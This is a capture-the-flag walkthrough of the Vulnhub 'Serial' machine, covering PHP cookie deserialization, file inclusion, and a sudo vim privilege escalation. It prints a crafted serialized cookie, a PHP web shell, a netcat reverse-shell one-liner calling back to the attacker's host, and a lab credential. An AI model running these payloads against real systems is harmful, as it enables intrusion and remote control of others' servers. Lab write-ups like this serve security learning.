Vulnhub - serial writeup
Serial
Author: Daniele
Nmap
hmm….seems like a machine with simple Stuff. Let’s start with HTTP
HTTP
Nothing fancy just a simple intro. What we notice is a special Cookie
named user
and message also talks about cookie
. That cookie seemed like a base64 encoded cookie so let’s just decode it to see what we find in it.
O:4:"User":2:{s:10:".User.name";s:3:"sk4";s:9:".User.wel";O:7:"Welcome":0:{}}
So obviously the very first thing that I would try is to change the name to something like admin
or root
.
For encoding and decoding we can use Burp’s decoded
And then send it with the request in the user
cookie.
I did that but got nothing
.
I tried with different names but none of them worked.
While I was doing this I ran dirsearch
and it found a hidden directory.
When we visit that page we can see a bak.zip
file.
I downloaded the file and it had 3 other files showing the source of website.
- user.class.php
<?php
include("log.class.php");
class Welcome {
public function handler($val) {
echo "Hello " . $val;
}
}
class User {
private $name;
private $wel;
function __construct($name) {
$this->name = $name;
$this->wel = new Welcome();
}
function __destruct() {
//echo "bye\n";
$this->wel->handler($this->name);
}
}
?>
- log.class.php
<?php
class Log {
private $type_log;
function __costruct($hnd) {
$this->$type_log = $hnd;
}
public function handler($val) {
include($this->type_log);
echo "LOG: " . $val;
}
}
?>
- index.php
<?php
include("user.class.php");
if(!isset($_COOKIE['user'])) {
setcookie("user", base64_encode(serialize(new User('sk4'))));
} else {
unserialize(base64_decode($_COOKIE['user']));
}
echo "This is a beta test for new cookie handler\n";
?>
We can see that when we visit the wesbite we are shown the output present in index.php
and it generate cookie for user name sk4
.
If we look at the code in user.class.php
it’s calling the Welcome
class but the Log
class from log.class.php
isn’t called anywhere. So this is what I did, I edited the source to call the Log class
.
To do so edit the user.class.php
in the following manner
- In the
__construct
function change$this->wel = new Welcome();
to$this->wel = new Log();
- In the end of the file right before
?>
add the following likeecho base64_encode(serialize(new User('admin')));
(you can use anyname you want)
So the code would become
<?php
include("log.class.php");
class Welcome {
public function handler($val) {
echo "Hello " . $val;
}
}
class User {
private $name;
private $wel;
function __construct($name) {
$this->name = $name;
$this->wel = new Log();
}
function __destruct() {
//echo "bye\n";
$this->wel->handler($this->name);
}
}
echo base64_encode(serialize(new User('admin')));
?>
After I ran this code I got a base64 encoded string and some error.
Now if we focus on the error it says that the file to be included couldn’t be found. DAMN!!!!!!
This is when it clicked the log.class.php
is using include()
to include a file. So If we can give it a file path says /etc/passwd
and then generate the cookie and use that cookie it should include that file, showing us the content of it(I guess).
So I edited the log.class.php
by editing the following line
private $type_log;
toprivate $type_log = "/etc/passwd";
I used that cookie and BOOM!!! 💥💥💥💥💥
Now we can use RFI to exploit this. First we can run a python server that will have a file containing a shell and then we can include that.
I made a file name shell
having the following content
<? php
system($_GET['cmd']);
?>
Using python -m http.server
I started the server now we can include that in our code.
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MzA6Imh0dHA6Ly8xOTIuMTY4LjU2LjE6ODAwMC9zaGVsbCI7fX0=
I used this cookie and I was able to execute command.
Now we can simply get a shell. I used the OpenBSD netcat format which was URL encoded.
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.56.1%201337%20%3E%2Ftmp%2Ff
I started looking around and found credential.txt.bak
in the /
dir which had credential for sk4
user.
sk4:KywZmnPWW6tTbW5w
Now we can use these creds to login via SSH.
Privilege escalation
In the sk4
directory I found flag.txt
.
After this I ran the enumeration script to see if there’s any SUID or any other interesting thing or not.
The enum script didn’t gave anything but I found something good in sudo
rights.
We can simply start vim
by running sudo vim
and then press :
and execute the command !bash
to get the root-shell.
Now we can just cat the root flag.
This was really nice machine with a very great foothold. Thanks to @sk4 for this awesome machine.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.